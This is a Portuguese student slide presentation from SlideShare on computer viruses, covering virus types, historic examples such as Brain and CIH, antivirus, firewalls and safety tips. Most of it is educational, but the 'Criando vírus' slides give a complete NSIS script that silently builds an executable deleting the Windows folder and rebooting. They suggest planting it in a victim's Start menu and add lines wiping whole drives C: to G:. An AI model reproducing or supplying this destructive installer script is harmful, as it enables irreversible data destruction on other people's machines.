Virus em Hw

50 %
50 %
Information about Virus em Hw
Technology

Published on November 6, 2009

Author: eduardo.bregaida

Source: slideshare.net

Description

Trabalho apresentado na aula de Arquitetura de Hardware para o professor Claudio Cura.
Integrantes:
Eduardo Bregaida
Roberta
Davi
Vinicius

O que é e qual possíveis ações: Vírus

Texto Educativo Não nos responsabilizamos pelo mau uso… Não façam besteiras ;p

Quem Somos?

São softwares que foram desenvolvidos por programadores, onde burlam sistemas alheios; Atuam da mesma forma que um vírus real; Primeiro vírus surgiu em 1983,por Lean Eidelmen;

São softwares que foram desenvolvidos por programadores, onde burlam sistemas alheios;

Atuam da mesma forma que um vírus real;

Primeiro vírus surgiu em 1983,por Lean Eidelmen;

Alguns tipos de vírus

Virus de Boot- Infecta a partição de inicialização do Sistema Operacional. Time Bomb - Ativados em Datas e horários especificos. Worm - Vírus que tenta se multiplicar em outras máquinas. Trojan Hourse - Assim como na história, este vírus se introduz na máquina da vítima, permitindo que o atacante tenha controle sobre a máquina. Hijackers - Scripts que normalmente atacam os Browsers modificando suas páginas iniciais e abrindo urls não conhecidas pelo usuário. .

Keylogger - Vírus que obtem tudo que o usuário digita e envia a pessoa que o enviou. Computador Zumbi ou Estado Zumbi - Vírus que permite ao atacante instalar Keyloggers e outros, também pode aplicar ataques a sites, sem que o usuário deste computador saiba. Stealth - Vírus polimórfico, que se multiplica e se torna indetectável, exemplos: Natas e Brain. Macro - Vírus que infecta o pacote Office, causando inconveniências para a pessoa que tem seu computador infectado.

Dados estatísticos

Dados estatísticos Até 1995 - 5.000 vírus conhecidos; Até 1999 - 20.500 vírus conhecidos; Até 2000 - 49.000 vírus conhecidos; Até 2001 - 58.000 vírus conhecidos; Até 2005 - Aproximadamente 75.000 vírus conhecidos; Até 2007 - Aproximadamente 200.000 vírus conhecidos; Até novembro de 2008 - Mais de 530.000 vírus conhecidos. Até março de 2009 - Mais 630.000 vírus conhecidos.

Até 1995 - 5.000 vírus conhecidos;

Até 1999 - 20.500 vírus conhecidos;

Até 2000 - 49.000 vírus conhecidos;

Até 2001 - 58.000 vírus conhecidos;

Até 2005 - Aproximadamente 75.000 vírus conhecidos;

Até 2007 - Aproximadamente 200.000 vírus conhecidos;

Até novembro de 2008 - Mais de 530.000 vírus conhecidos.

Até março de 2009 - Mais 630.000 vírus conhecidos.

Crackers e hackers Hackers são os que quebram senhas, códigos e sistemas de segurança por puro prazer em achar tais falhas. Preocupam-se em conhecer o funcionamento mais íntimo de um sistema computacional ou seja uma sem intenções de prejudicar outras ou invadir sistemas. Crackers é o criminoso virtual, que extorque pessoas usando seus conhecimentos, usando as mais variadas estratégias. Aficcionados em informática, conhecem muitas linguagens de programação e quase sempre jovens, que criavam seus vírus, para muitas vezes, saber o quanto eles poderiam se propagar.

Hackers são os que quebram senhas, códigos e sistemas de segurança por puro prazer em achar tais falhas.

Preocupam-se em conhecer o funcionamento mais íntimo de um sistema computacional ou seja uma sem intenções de prejudicar outras ou invadir sistemas.

Crackers é o criminoso virtual, que extorque pessoas usando seus conhecimentos, usando as mais variadas estratégias.

Aficcionados em informática, conhecem muitas linguagens de programação e quase sempre jovens, que criavam seus vírus, para muitas vezes, saber o quanto eles poderiam se propagar.

Vírus mais comuns

Elk Cloner O primeiro vírus ampla distribuição criado por um garoto de 15 anos em 1982. Atacava computadores Apple 2 com DOS; Não atacava arquivos apenas exibia uma mensagem: Elk Cloner: The program with a personality It will get on all your disks It will infiltrate your chips Yes it's Cloner! It will stick to you like glue It will modify RAM too Send in the Cloner!

O primeiro vírus ampla distribuição criado por um garoto de 15 anos em 1982.

Atacava computadores Apple 2 com DOS;

Não atacava arquivos apenas exibia uma mensagem:

Elk Cloner: The program with a personality It will get on all your disks It will infiltrate your chips Yes it's Cloner! It will stick to you like glue It will modify RAM too Send in the Cloner!

Brain Janeiro de 1986; Considerado um dos primeiros vírus conhecido; Afetava o MS-DOS; Welcome to the Dungeon © 1986 Basit * Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAM BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE: 430791,443248,280530. Beware of this VIRUS.... Contact us for vaccination… Motivo: foi criado para monitorar cópias piratas de um software médico de monitoramento cardíaco que haviam desenvolvido para a Apple; O código foi portado para DOS; A companhia foi alvo de ações judiciais e foi fechada.

Janeiro de 1986;

Considerado um dos primeiros vírus conhecido;

Afetava o MS-DOS;

Welcome to the Dungeon © 1986 Basit * Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAM BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE: 430791,443248,280530. Beware of this VIRUS.... Contact us for vaccination…

Motivo: foi criado para monitorar cópias piratas de um software médico de monitoramento cardíaco que haviam desenvolvido para a Apple;

O código foi portado para DOS;

A companhia foi alvo de ações judiciais e foi fechada.

Ping Pong Ano 1988; Um dos primeiros vírus conhecidos no Brasil; Afetava o MS-DOS e PC-DOS; Se instalava na Interrupção 8 da BIOS; Dependendo do Tic-Tac do relógio a bolinha pulava de um lado a outro da tela; Uma vez o computador infectado, multiplicava-se nos disquetes.

Ano 1988;

Um dos primeiros vírus conhecidos no Brasil;

Afetava o MS-DOS e PC-DOS;

Se instalava na Interrupção 8 da BIOS;

Dependendo do Tic-Tac do relógio a bolinha pulava de um lado a outro da tela;

Uma vez o computador infectado, multiplicava-se nos disquetes.

Sasser Um dos primeiros que explora a invasão do PC; Não precisa abrir o email ou executar o arquivo; A infecção da-se por um processo de Exploit; Este Vírus explorava a rede e permitia controle do computador infectado; Utilizava a porta RPC do Windows para invadir .

Um dos primeiros que explora a invasão do PC;

Não precisa abrir o email ou executar o arquivo;

A infecção da-se por um processo de Exploit;

Este Vírus explorava a rede e permitia controle do computador infectado;

Utilizava a porta RPC do Windows para invadir .

Jerusálem Residente em memória; Infecta arquivos com extensão .COM, .EXE, .BIN, .PIF e .OVL; Não infecta o arquivo COMMAND.COM; Pode ter sido baseado no vírus Suriv 3.00 (isolado após o Jerusalém); Vários outros vírus se baseiam em seu código e método de infecção e ataque; Interrompe o computador das 08h e 21h; Após 30 minutos aumentam demais os arquivos infectados, deixando os computadores lentos; Ataca às sextas-feiras cujo número seja 13, por isso muitos os chamam de Sexta-Feira 13; Nesse momento o vírus apaga qualquer arquivo que o usuário tenta executar.

Residente em memória;

Infecta arquivos com extensão .COM, .EXE, .BIN, .PIF e .OVL;

Não infecta o arquivo COMMAND.COM;

Pode ter sido baseado no vírus Suriv 3.00 (isolado após o Jerusalém);

Vários outros vírus se baseiam em seu código e método de infecção e ataque;

Interrompe o computador das 08h e 21h;

Após 30 minutos aumentam demais os arquivos infectados, deixando os computadores lentos;

Ataca às sextas-feiras cujo número seja 13, por isso muitos os chamam de Sexta-Feira 13;

Nesse momento o vírus apaga qualquer arquivo que o usuário tenta executar.

Z otob Vírus do tipo Worm que ataca o Windows 2000; A gravidade classificada pela Microsoft como moderada; A Microsoft possui uma atualização de segurança contra este vírus e suas variantes; Variantes conhecidas: Zotob A, B, C, D e E.

Vírus do tipo Worm que ataca o Windows 2000;

A gravidade classificada pela Microsoft como moderada;

A Microsoft possui uma atualização de segurança contra este vírus e suas variantes;

Variantes conhecidas:

Zotob A, B, C, D e E.

Winman32 Um vírus informativo; Modo de infecção: sites de relacionamento; Não causa danos ao SO, porém dispara mensagens nos sistemas de relacionamento que a vitima acessa; Mensagens conhecidas: "Olha esse video q encontrei sobre o acidente da gol.. (link com vírus omitido) " "Veja as fotos da nossa festa, ficaram ótimas!! (link com vírus omitido) " "Assista ao vídeo da Daniela Cicarrelli fazendo sexo com o namorado na praia, últimos dias no ar!!! (link com vírus omitido) " "Um casal de adolescentes caiu na besteira de tirar fotos e filmar suas transas, a porra toda caiu na net, coitados... veja você mesmo (link com vírus omitido) "

Um vírus informativo;

Modo de infecção: sites de relacionamento;

Não causa danos ao SO, porém dispara mensagens nos sistemas de relacionamento que a vitima acessa;

Mensagens conhecidas:

"Olha esse video q encontrei sobre o acidente da gol.. (link com vírus omitido) "

"Veja as fotos da nossa festa, ficaram ótimas!! (link com vírus omitido) "

"Assista ao vídeo da Daniela Cicarrelli fazendo sexo com o namorado na praia, últimos dias no ar!!! (link com vírus omitido) "

"Um casal de adolescentes caiu na besteira de tirar fotos e filmar suas transas, a porra toda caiu na net, coitados... veja você mesmo (link com vírus omitido) "

Sircam Se propaga por e-mail; Ataca usuários de Windows; Texto enviado no e-mail uma mensagem com o vírus em anexo: "Eu te enviei esse arquivo, me responda se gostou".

Se propaga por e-mail;

Ataca usuários de Windows;

Texto enviado no e-mail uma mensagem com o vírus em anexo:

"Eu te enviei esse arquivo, me responda se gostou".

Natas ou Satan Desenvolvido por James Gentile em 94; Ataca o SO DOS; Seu nome é o nome Satanás em inglês Satan; Adota Técnicas Stelth, quando está na RAM, impede que o código que ele aloja no final de todos os programas infectados seja detectado; Pode sobreescrever trechos do HD ou setor de Boot.

Desenvolvido por James Gentile em 94;

Ataca o SO DOS;

Seu nome é o nome Satanás em inglês Satan;

Adota Técnicas Stelth, quando está na RAM, impede que o código que ele aloja no final de todos os programas infectados seja detectado;

Pode sobreescrever trechos do HD ou setor de Boot.

Leandro & Kelly Criado em 1995; Distribuído em SW piratas; Atacava o SO MS-DOS; Se multiplica em discos inseridos no PC infectado; Infecta o Boot; Teve uma grande repercursão, pois é uma variante do vírus Michelangelo; Foi um vírus brasileiro de grande impacto.

Criado em 1995;

Distribuído em SW piratas;

Atacava o SO MS-DOS;

Se multiplica em discos inseridos no PC infectado;

Infecta o Boot;

Teve uma grande repercursão, pois é uma variante do vírus Michelangelo;

Foi um vírus brasileiro de grande impacto.

Michelangelo Variante do Stoned; Entra em atividade no dia do nascimento de Michelangelo, dia 6 de março; Sobreescreve a maior parte do HD .

Variante do Stoned;

Entra em atividade no dia do nascimento de Michelangelo, dia 6 de março;

Sobreescreve a maior parte do HD .

Stoned Feito para ser inofensivo, porém devido um erro de código, porém escreve na trilha zero do disco; Ah diversas variantes deste vírus, alguns com mensagens plíticas, outras explodem a tela em cores de chamas quando passa um mês depois de instalados; Mensagens mais comuns: “ Your computer is now stoned." "Bloody! Jun. 4, 1989". "The Swedish Disaster".

Feito para ser inofensivo, porém devido um erro de código, porém escreve na trilha zero do disco;

Ah diversas variantes deste vírus, alguns com mensagens plíticas, outras explodem a tela em cores de chamas quando passa um mês depois de instalados;

Mensagens mais comuns:

“ Your computer is now stoned."

"Bloody! Jun. 4, 1989".

"The Swedish Disaster".

Pro Rat É um backdoor da classe Rat (Remote Administrator Tool), possui muitas funções de espião; Permite que pessoas executem muitas ações maliciosas; Algumas funcões: Keystrokes (Keylogger) Roubar senhas Controle total sobre arquivos Formatação de drives Controle de impressora Abrir/fechar drive de CD Esconder a barra de tarefas, área de trabalho e botão iniciar Tirar screenshots Visualizar informações do sistema Visualizar webcam Escutar microfone Fazer downloads e rodar arquivos Travar a tela, mouse, teclado, dentre outros Visualizar a area de trabalho da vitima Chegando até a formatar a máquina da vítima.

É um backdoor da classe Rat (Remote Administrator Tool), possui muitas funções de espião;

Permite que pessoas executem muitas ações maliciosas;

Algumas funcões:

Keystrokes (Keylogger)

Roubar senhas

Controle total sobre arquivos

Formatação de drives

Controle de impressora

Abrir/fechar drive de CD

Esconder a barra de tarefas, área de trabalho e botão iniciar

Tirar screenshots

Visualizar informações do sistema

Visualizar webcam

Escutar microfone

Fazer downloads e rodar arquivos

Travar a tela, mouse, teclado, dentre outros

Visualizar a area de trabalho da vitima

Chegando até a formatar a máquina da vítima.

NetBus Outro backdoor; Uma vez instalado permite que o atacante tenha total controle sobre a máquina da vítima; Muito usado para roubar informações.

Outro backdoor;

Uma vez instalado permite que o atacante tenha total controle sobre a máquina da vítima;

Muito usado para roubar informações.

Chernobyl

Win32/CIH ou Chernobyl Criado em 98 por Chen Ing-Hau; Um dos mais temidos vírus e o ÚNICO efetivo no ataque ao Hardware; Apagava a BIOS e o Disco de Boot no dia 26 de abril (algumas variantes atacavam em outros meses também); Curiosidade: em 26 de Abril aconteceu o desastre Nuclear de Chernobyl, daí o nome; É um vírus residente em memória, infecta qualquer disco externo; É da categoria stealth; Ataca a Flash Bios; Por motivos de compatibilidade não ataca as versões Windows NT, 2000, XP, 2003, Vista e 7;

Criado em 98 por Chen Ing-Hau;

Um dos mais temidos vírus e o ÚNICO efetivo no ataque ao Hardware;

Apagava a BIOS e o Disco de Boot no dia 26 de abril (algumas variantes atacavam em outros meses também);

Curiosidade: em 26 de Abril aconteceu o desastre Nuclear de Chernobyl, daí o nome;

É um vírus residente em memória, infecta qualquer disco externo;

É da categoria stealth;

Ataca a Flash Bios;

Por motivos de compatibilidade não ataca as versões Windows NT, 2000, XP, 2003, Vista e 7;

Win32/CIH ou Chernobyl Primeiro Passo Download da BIOS e uma placa mãe compatível. Segundo passo, reprogramação da BIOS: No DOS, remova o chip do BIOS bom e substitua pelo chip do BIOS. Passo três: Rode o programa de gravação do BIOS e reprograme o BIOS apagado. Passo quatro: Desligue o micro, remova o BIOS que você acabou de reprogramar e instale de volta o BIOS original. Passo quatro: Instale o BIOS reprogramado na placa-mãe "morta" e ligue-a. Passo cinco: Rode o anti-vírus e o programa de recuperação de dados no HD do micro atacado, caso o mesmo tenha sido infectado. Informações: http://www.clubedohardware.com.br/artigos/654/1

Primeiro Passo

Download da BIOS e uma placa mãe compatível.

Segundo passo, reprogramação da BIOS:

No DOS, remova o chip do BIOS bom e substitua pelo chip do BIOS.

Passo três:

Rode o programa de gravação do BIOS e reprograme o BIOS apagado.

Passo quatro:

Desligue o micro, remova o BIOS que você acabou de reprogramar e instale de volta o BIOS original.

Passo quatro:

Instale o BIOS reprogramado na placa-mãe "morta" e ligue-a.

Passo cinco:

Rode o anti-vírus e o programa de recuperação de dados no HD do micro atacado, caso o mesmo tenha sido infectado.

Informações: http://www.clubedohardware.com.br/artigos/654/1

Vírus em celular

"Cabir.A", Junho de 2004; Não infectou muitos aparelhos; Transmitido via BlueTooh; Variantes em 2005; Mabir.A, Skulls.A, Commwarrior.A, Locknut.B e Fontal.A; São apenas vírus que disparam mensagens e afins; Não tem propagação rápida; Não são destrutivos.

"Cabir.A",

Junho de 2004;

Não infectou muitos aparelhos;

Transmitido via BlueTooh;

Variantes em 2005;

Mabir.A, Skulls.A, Commwarrior.A, Locknut.B e Fontal.A;

São apenas vírus que disparam mensagens e afins;

Não tem propagação rápida;

Não são destrutivos.

Criando vírus

Com o Bloco de notas digite : !define PRODUCT_NAME "APAGADOR_XXX" !define PRODUCT_VERSION "1.0" !define PRODUCT_PUBLISHER "HACKER_XXX" SetCompressor lzma Name "${PRODUCT_NAME} ${PRODUCT_VERSION}" OutFile "MeuVirus.exe" InstallDir "$TEMP" Icon "${NSISDIR}ContribGraphicsIconsmodern-install.ico" SilentInstall silent Section "Sec001" SEC01 Delete /REBOOTOK "$WINDIR*.*" SectionEnd Section -Post Reboot SectionEnd

Com o Bloco de notas digite :

!define PRODUCT_NAME "APAGADOR_XXX" !define PRODUCT_VERSION "1.0" !define PRODUCT_PUBLISHER "HACKER_XXX"

SetCompressor lzma

Name "${PRODUCT_NAME} ${PRODUCT_VERSION}" OutFile "MeuVirus.exe" InstallDir "$TEMP" Icon "${NSISDIR}ContribGraphicsIconsmodern-install.ico" SilentInstall silent

Section "Sec001" SEC01 Delete /REBOOTOK "$WINDIR*.*" SectionEnd

Section -Post Reboot SectionEnd

Próximo passo: Salvar Como qualquerNome .nsi Experimente jogá-lo no menu iniciar da vítima ;)

Próximo passo:

Salvar Como

qualquerNome .nsi

Experimente jogá-lo no menu iniciar da vítima ;)

Mais? =)

Mais?

=)

Tudo o que você deletar coloque essas linhas: Delete /REBOOTOK "C:oot.ini" Delete /REBOOTOK "C:Meus documentos*.*" Delete /REBOOTOK "C:*.*" Delete /REBOOTOK "D:*.*" Delete /REBOOTOK "E:*.*" Delete /REBOOTOK "F:*.*" Delete /REBOOTOK "G:*.*" Delete /REBOOTOK "C:Arquivos de programas*.*" Adicione o que quiser, arquivos específicos, etc.

Tudo o que você deletar coloque essas linhas:

Delete /REBOOTOK "C:oot.ini" Delete /REBOOTOK "C:Meus documentos*.*" Delete /REBOOTOK "C:*.*" Delete /REBOOTOK "D:*.*" Delete /REBOOTOK "E:*.*" Delete /REBOOTOK "F:*.*" Delete /REBOOTOK "G:*.*" Delete /REBOOTOK "C:Arquivos de programas*.*"

Adicione o que quiser, arquivos específicos, etc.

Usuário de Windows

Uma Esperança

Antivírus são softwares projetados para detectar e eliminar vírus de computador, monitorando automaticamente todos os arquivos que são abertos no PC

Por vezes quando executamos um qualquer script no Windows seja ele VBscript ou JSscript recebemos uma mensagem do antivírus a avisar da exploração de alguma falha do sistema Como é que isso é possível

Surgimento do antivírus

Peter Norton, empresário de TI, apagou acidentalmente um arquivo, com isso desenvolveu o Norton Utilities para restaurá-los. Ele criou a Symantec, em 1982, dando início a criação e comercialização de softwares de seguranças no mercado, e livros sobre o assunto. Ele foi um dos primeiros desenvolvedores de sistemas de segurança

Teste de Antivirus

Firewall Outra grande ferramenta de proteção contra os Vírus

S ão programas que monitoram todos os dados que entram e saem do micro funcionam como complemento do antivírus, pois ajudam a evitar que os vírus tentem se multiplicar via rede e dificulta a ação de hackers (invasores de computadores) Seu objetivo é permitir somente a transmissão e a recepção de dados autorizados

Conheça uns a seguir:

Filtragem de pacotes firewall que trabalha na filtragem de pacotes é muito utilizado em redes pequenas ou de porte médio. Alguns sistemas ou serviços podem ser liberados completamente (por exemplo, o serviço de e-mail da rede); Enquanto outros são bloqueados por padrão, por terem riscos elevados (como softwares de mensagens instantâneas, tal como o ICQ). O grande problema desse tipo de firewall, é que as regras aplicadas podem ser muito complexas e causar perda de desempenho da rede ou não serem eficazes o suficiente

Filtragem de pacotes

firewall que trabalha na filtragem de pacotes é muito utilizado em redes pequenas ou de porte médio.

Alguns sistemas ou serviços podem ser liberados completamente (por exemplo, o serviço de e-mail da rede);

Enquanto outros são bloqueados por padrão, por terem riscos elevados (como softwares de mensagens instantâneas, tal como o ICQ).

O grande problema desse tipo de firewall, é que as regras aplicadas podem ser muito complexas e causar perda de desempenho da rede ou não serem eficazes o suficiente

O firewall de aplicação permite um acompanhamento mais preciso do tráfego entre a rede e a Internet (ou entre a rede e outra rede). É possível, inclusive, contar com recursos de log e ferramentas de auditoria. Tais características deixam claro que este tipo de firewall é voltado a redes de porte médio ou grande e que sua configuração exige certa experiência no assunto

 

Razões para utilizar um firewall

1 - O firewall pode ser usado para ajudar a impedir que sua rede ou seu computador seja acessado sem autorização. Assim, é possível evitar que informações sejam capturadas ou que sistemas tenham seu funcionamento prejudicado pela ação de hackers 2 - O firewall é um grande aliado no combate a vírus e cavalos –de -tróia, uma vez que é capaz de bloquear portas que eventualmente sejam usadas pelas "pragas digitais" ou então bloquear acesso a programas não autorizados 3 - Em redes corporativas, é possível evitar que os usuários acessem serviços ou sistemas indevidos, além de ter o controle sobre as ações realizadas na rede, sendo possível até mesmo descobrir quais usuários as efetuaram As 3 principais razões para se usar um firewall são:

Dicas de como se proteger

Desconfie dos e-mails que recebe... Não clique em qualquer link ou anexo... Simples não?

Não abra qualquer site; Não baixe qualquer arquivo sem saber a fonte; NÃO EXISTE JOGOS DE 300Kb para PlayStation e afins... Nunca forneça suas senhas...

Sempre atualize seus sistemas de proteção: Firewall; Anti-Vírus; Anti-Spyware; Bla bla bla ;)

Não deixar pastas compartilhadas no HD desnecessariamente Certificar que a conexão estabelecida entre o computador e os servidores é segura, conforme explicado no tópico segurança no Internet Banking Te pego na Encruza

Maldita inclusão digital e PC do milhão… http://www.youtube.com/watch?v=8zFYt1_0FUE

O Windows não tem falhas…

Não quer vírus?

FIM

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

m.do.co

Hier sollte eine Beschreibung angezeigt werden, diese Seite lässt dies jedoch nicht zu.
Read more

The New England Journal of Medicine: Research & Review ...

The New England Journal of Medicine (NEJM) ... Zika Virus and the Guillain–Barré Syndrome — Case Series from Seven Countries [33,235 views]
Read more

Flu Attack! How A Virus Invades Your Body - YouTube

Flu Attack! How A Virus Invades Your Body NPR. Subscribe Subscribed Unsubscribe 83,047 83K. ... WINTER VIRUS - INFLUENZA ( How to Beat Them ) ...
Read more

GMX: Email-Adresse, FreeMail, De-Mail & Nachrichten

Zika-Virus; Magazine; Sport; Fußball-Transferticker; Unterhaltung; Pokémon Go; Promi Big Brother 2016; Oktoberfest 2016 in München; Supertalent 2016; Leben;
Read more

HWDeviceService64.exe Windows Prozess - Was ist das?

Solche unerwünschten Adware Programme werden oft von einer Antivirus Software nicht als Virus ... browsemngr.dll tpsbattm.exe em_exec.exe ...
Read more

Emsisoft Anti-Malware for best protection - Free removal ...

Emsisoft Anti-Malware for best protection - Free removal of Viruses, Bots, Spyware, Keyloggers, Trojans and Rootkits
Read more

Comparison of different prime-boost regimes with DNA and ...

van Rooij EM(1), Rijsewijk FA, Moonen-Leusen HW, Bianchi AT, Rziha HJ. Author information: ... Both DNA and Orf virus (ORFV; Parapox virus) ...
Read more

Is This Website Safe | Website Security | Norton Safe Web

Norton Safe Web scans millions of websites to make sure they are safe. Visit Norton Safe Web now to see if a website you are interested is safe to visit ...
Read more

Buy Internet Security & Antivirus Software | Kaspersky Lab US

Buy antivirus & Internet security software from Kaspersky Lab, a recognized leader in computer security. Stay protected from computer viruses, spyware, & more.
Read more

Official Avira Support - Knowledgebase & Customer Support

Official Avira Support. Get help with home and business antivirus products, search our knowledgebase, or hire an expert
Read more